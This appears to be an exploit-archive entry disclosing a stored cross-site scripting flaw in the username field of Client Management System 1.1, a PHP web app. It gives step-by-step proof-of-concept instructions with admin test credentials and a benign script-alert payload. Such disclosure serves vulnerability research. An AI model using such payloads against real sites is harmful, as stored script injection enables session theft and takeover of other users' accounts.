Exploits / Vulnerability Discovered : 2021-06-15 |
Type : webapps |
Platform : php
This exploit / vulnerability Client management system 1.1 username stored crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
Client Management System 1.1 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/clientms/admin/index.php
2) Login as admin using test credentials: admin/Test@123
3) Goto: http://localhost/clientms/admin/admin-profile.php
4) Enter the following payload in the user name field: <script>alert(1)</script>
5) Click on Update
6) Our payload is fired and stored
Client management system 1.1 username stored crosssite scripting (xss)